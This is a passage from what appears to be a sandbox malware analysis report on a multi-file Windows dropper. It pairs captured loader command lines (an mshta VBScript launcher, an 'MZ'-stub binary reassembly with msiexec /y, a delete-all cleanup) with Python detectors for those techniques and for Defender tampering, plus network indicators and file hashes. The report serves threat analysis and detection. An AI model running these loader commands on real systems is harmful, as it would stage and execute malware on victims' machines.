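    r'"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )',
    r'"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W',
    r'msiexec /y ..\_enU.W',
]

# Patterns are case-insensitive on purpose: the launcher randomises letter case
# (vbscRIPT, CopY, StaRT) to defeat naive string matching.
DEFENDER_TAMPER = re.compile(
    r'Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true'
    r'|Add-MpPreference\s+-ExclusionPath'
    r'|-MAPSReporting\s+Disable|-SubmitSamplesConsent\s+NeverSend', re.I)
MSHTA_VBS = re.compile(r'mshta(?:\.exe)?"?\s+vbscript:', re.I)
TASKKILL_IM = re.compile(r'taskkill\s+/f\s+[-/]im\b', re.I)
MZ_STUB = re.compile(r'set\s+/p\s*=\s*"*MZ"*\s*>\s*([^\s&]+)', re.I)        # echo | set /p = "MZ" > stub
COPY_BINARY = re.compile(r'copy\s+/y\s+/b\s+([^&]+?)\s+([^\s&]+)\s*&', re.I)  # copy /b a + b + c dest
DEL_ALL = re.compile(r'\bdel\s+/q\s+\*', re.I)
MSIEXEC_Y = re.compile(r'msiexec\s+/y\s+([^\s&]+)', re.I)                  # /y = DllRegisterServer on the file


def classify(cmdline: str) -> List[str]:
    """Tag one command line with the techniques it exhibits (tag order is fixed)."""
    checks = [
        ('defender_tamper', DEFENDER_TAMPER),
        ('mshta_vbscript_launcher', MSHTA_VBS),
        ('kills_parent_copy', TASKKILL_IM),
        ('pe_reassembly', None),          # needs both the MZ stub and a binary copy
        ('cleanup_del_all', DEL_ALL),
        ('msiexec_dll_load', MSIEXEC_Y),
    ]
    tags = []
    for tag, pattern in checks:
        if pattern is None:
            hit = bool(MZ_STUB.search(cmdline) and COPY_BINARY.search(cmdline))
        else:
            hit = bool(pattern.search(cmdline))
        if hit:
            tags.append(tag)
    return tags


def parse_reassembly(cmdline: str) -> Optional[Dict[str, object]]:
    """Pull stub file, fragment order, output name and loader out of a reassembly one-liner."""
    stub, cat = MZ_STUB.search(cmdline), COPY_BINARY.search(cmdline)
    if not (stub and cat):
        return None
    parts = [p.strip() for p in cat.group(1).split('+') if p.strip()]
    loader = MSIEXEC_Y.search(cmdline)
    return {'stub_file': stub.group(1), 'parts': parts, 'dest': cat.group(2),
            'loader': loader.group(1) if loader else None}


# Constructed stand-ins for the RarSFX1 fragments named in the Files section; the
# report records only their names and hashes, and the 2-byte "MZ" stub is assumed.
FRAGMENTS: Dict[str, bytes] = {
    'PUVMYbL.81': b'MZ',
    'B0zcq1x.o': b'\x00' * 58 + (0x40).to_bytes(4, 'little'),  # rest of the DOS header, e_lfanew = 0x40
    '490lw~.x': b'PE\x00\x00',                                 # NT signature
    'lNOSCc5X.Dt': b'\x4c\x01' + b'\x00' * 18,                  # COFF header, Machine = i386
    'Y2Yadq.8~': b'\x0b\x01' + b'\x00' * 94,                    # optional header, magic PE32
    'nPI8.L': b'.text\x00\x00\x00' + b'\x00' * 32,              # one section header
    'Fbu1EQ9.~I': bytes(range(256)),                            # section data
}


def reassemble(parts: List[str], fragments: Dict[str, bytes]) -> bytes:
    """Emulate `copy /b a + b + c dest`: binary concatenation with case-insensitive names."""
    table = {name.lower(): data for name, data in fragments.items()}
    return b''.join(table[p.lower()] for p in parts)


def looks_like_pe(blob: bytes) -> bool:
    """Minimal PE check: 'MZ' at offset 0 and e_lfanew (offset 0x3c) pointing at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b'MZ':
        return False
    e_lfanew = int.from_bytes(blob[0x3c:0x40], 'little')
    return blob[e_lfanew:e_lfanew + 4] == b'PE\x00\x00'


if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(classify(line), line[:60])
    plan = parse_reassembly(SAMPLE_CMDLINES[3])
    blob = reassemble(plan['parts'], FRAGMENTS)
    print('fragments look like PE:', [looks_like_pe(f) for f in FRAGMENTS.values()])
    print('reassembled looks like PE:', looks_like_pe(blob), 'loaded via msiexec /y', plan['loader'])
```

The fragment order recovered from the copy /b operand list is the only thing needed to rebuild the payload from the dropped parts, so when the sandbox captured the fragments but not the assembled file, the same parse gives the order to concatenate them in. The lookup is case-insensitive because the command spells the names differently from the directory listing (PUVMYbl.81 versus PUVMYbL.81) and NTFS does not care.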
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wensela.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | propanla.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| N/A | 127.0.0.1:61238 | | tcp |
| N/A | 127.0.0.1:61240 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| US | 8.8.8.8:53 | 60.37.61.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
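The network table mixes four kinds of traffic that deserve different handling: resolver queries to 8.8.8.8, reverse (in-addr.arpa) lookups that the sandbox itself issues for every peer it observes, connections to well-known services the report's own findings account for (ip-api.com for the geolocation and external-IP lookups, iplogger.org, cdn.discordapp.com and pastebin.com as abused legitimate hosting, r11.o.lencr.org as Let's Encrypt OCSP), and repeated direct TCP connections to bare IPs on high ports with no preceding name resolution (91.121.67.60:2151, 194.104.136.5:46013, 135.181.129.119:4805, 72.84.118.132:8080), which are the endpoints most worth blocking and hunting for. The following is an added example and not part of the report: a Python pass over a constructed excerpt of the rows above that deduplicates endpoints and sorts them into those buckets. Raw exports of this table sometimes carry the protocol in the Domain column with an empty Proto cell, or drop the trailing pipe, and the parser accepts both layouts. The roles assigned to the named hosts are an assumption for the example.

```python
from collections import Counter, defaultdict
from typing import Dict, NamedTuple, Optional


class Flow(NamedTuple):
    country: str
    ip: str
    port: int
    domain: Optional[str]
    proto: str


PROTOS = {'tcp', 'udp'}

# Assumption for the example: roles of the named hosts, taken from the report's own
# findings (geolocation / external-IP lookups, abused legitimate hosting) plus the
# Let's Encrypt OCSP responder, which is TLS background noise rather than malware traffic.
KNOWN_SERVICES = {
    'ip-api.com': 'geolocation / external IP check',
    'iplogger.org': 'IP logger',
    'cdn.discordapp.com': 'abused CDN hosting',
    'pastebin.com': 'abused paste hosting',
    'r11.o.lencr.org': "Let's Encrypt OCSP",
}

# Constructed excerpt of the rows above. Raw exports carry two layouts: the proper
# one with an empty Domain cell, and a shifted one where the protocol lands in the
# Domain column (occasionally without the trailing pipe).
SAMPLE_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wensela.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| N/A | 127.0.0.1:61238 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FI | 135.181.129.119:4805 | | tcp |
| US | 72.84.118.132:8080 | tcp | |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| NL | 194.104.136.5:46013 | tcp
"""


def parse_row(line: str) -> Optional[Flow]:
    """Parse one table row, tolerating the shifted layout and a missing trailing pipe."""
    line = line.strip()
    if not line.startswith('|'):
        return None
    cells = [c.strip() for c in line.strip('|').split('|')]
    if len(cells) < 3 or ':' not in cells[1]:
        return None                      # header row or malformed
    country, dest, rest = cells[0], cells[1], cells[2:]
    proto = next((c.lower() for c in rest if c.lower() in PROTOS), None)
    domain = next((c for c in rest if c and c.lower() not in PROTOS), None)
    if proto is None:
        return None
    ip, port = dest.rsplit(':', 1)
    return Flow(country, ip, int(port), domain, proto)


def classify(flow: Flow) -> str:
    if flow.ip.startswith('127.'):
        return 'loopback'
    if flow.proto == 'udp' and flow.port == 53:
        if flow.domain and flow.domain.endswith('.in-addr.arpa'):
            return 'dns_reverse'         # PTR lookups the sandbox issues for every peer it sees
        return 'dns_query'
    if flow.domain is None:
        return 'direct_ip'               # no name preceded it: hard-coded peer in the sample
    if flow.domain in KNOWN_SERVICES:
        return 'known_service'
    return 'unknown_domain'


def summarize(table: str) -> Dict[str, object]:
    """Deduplicate the table into per-category endpoint lists and a high-port shortlist."""
    flows = [f for f in map(parse_row, table.splitlines()) if f]
    counts: Counter = Counter()
    endpoints = defaultdict(set)
    for f in flows:
        cat = classify(f)
        counts[cat] += 1
        endpoints[cat].add(f.domain if cat.startswith('dns') else f'{f.ip}:{f.port}')
    high_port = {f'{f.ip}:{f.port}' for f in flows
                 if classify(f) == 'direct_ip' and f.port not in (80, 443)}
    return {
        'flows': len(flows),
        'counts': dict(counts),
        'endpoints': {k: sorted(v) for k, v in endpoints.items()},
        'direct_ip_high_port': sorted(high_port),
    }


if __name__ == '__main__':
    summary = summarize(SAMPLE_ROWS)
    print(summary['counts'])
    print('direct high-port peers:', summary['direct_ip_high_port'])
```

The direct_ip bucket is the useful pivot: those peers were contacted repeatedly over the run without any DNS query, which is what a hard-coded address in the sample looks like from the outside. The known-service bucket should still be kept in the IoC set (the report flags the hosting services as abused), but blocking cdn.discordapp.com or pastebin.com wholesale is rarely acceptable, so the two lists are reported separately.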
Files
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe
| MD5 | b742c566607929a9735af5c299846051 |
| SHA1 | 09be99b3b9d2d7c834f1018fa431be9a40f30c87 |
| SHA256 | cdea7bfa75a3bc43c888e945754e11ff3d9db4ad5348898a751e5bc274f4cde7 |
| SHA512 | 33aa9956aec500a3c398bcea53624754bd8d5db4b0ed5e8552269c8f2f37a379041eeda0d7155124ac780dd46944e0bc968db875d1fac6d32544b781b07d7188 |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/1948-65-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1948-66-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1948-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/852-67-0x000000007364E000-0x000000007364F000-memory.dmp
memory/1948-64-0x0000000064940000-0x0000000064959000-memory.dmp
memory/852-69-0x0000000000B10000-0x0000000000B46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
memory/852-82-0x0000000073640000-0x0000000073DF0000-memory.dmp
memory/852-84-0x0000000004EB0000-0x00000000054D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/3852-85-0x0000000073640000-0x0000000073DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe
| MD5 | d165e339ef0c057e20eb61347d06d396 |
| SHA1 | cb508e60292616b22f2d7a5ab8f763e4c89cf448 |
| SHA256 | ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8 |
| SHA512 | da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580 |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
memory/2052-124-0x0000000002960000-0x0000000002966000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe
| MD5 | 6b4f4e37bc557393a93d254fe4626bf3 |
| SHA1 | b9950d0223789ae109b43308fcaf93cd35923edb |
| SHA256 | 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d |
| SHA512 | a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
memory/2052-103-0x0000000000850000-0x0000000000866000-memory.dmp
memory/3852-102-0x0000000073640000-0x0000000073DF0000-memory.dmp
memory/852-112-0x0000000005630000-0x0000000005984000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe
| MD5 | e90750ecf7d4add59391926ccfc15f51 |
| SHA1 | 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1 |
| SHA256 | b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59 |
| SHA512 | 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bq5afpt1.jus.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4920-99-0x0000000000330000-0x0000000000338000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe
| MD5 | 3bf8a169c55f8b54700880baee9099d7 |
| SHA1 | d411f875744aa2cfba6d239bad723cbff4cf771a |
| SHA256 | 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2 |
| SHA512 | f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11 |
memory/3852-90-0x0000000005E70000-0x0000000005ED6000-memory.dmp
memory/3852-89-0x0000000005E00000-0x0000000005E66000-memory.dmp
memory/1776-127-0x0000000000070000-0x00000000000E0000-memory.dmp
memory/3852-88-0x0000000005D60000-0x0000000005D82000-memory.dmp
memory/852-87-0x0000000073640000-0x0000000073DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/3852-68-0x0000000073640000-0x0000000073DF0000-memory.dmp
memory/4516-126-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2172-134-0x0000000004E30000-0x0000000004E4E000-memory.dmp
memory/4216-131-0x0000000000EC0000-0x0000000000F32000-memory.dmp
memory/3852-137-0x0000000006510000-0x000000000655C000-memory.dmp
memory/3852-136-0x00000000060B0000-0x00000000060CE000-memory.dmp
memory/2172-129-0x0000000004E60000-0x0000000004ED6000-memory.dmp
memory/2172-128-0x0000000000600000-0x0000000000670000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-0SQKG.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2172-154-0x0000000005570000-0x0000000005B14000-memory.dmp
memory/3028-151-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1948-63-0x000000006494A000-0x000000006494F000-memory.dmp
memory/1948-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1948-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1948-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp
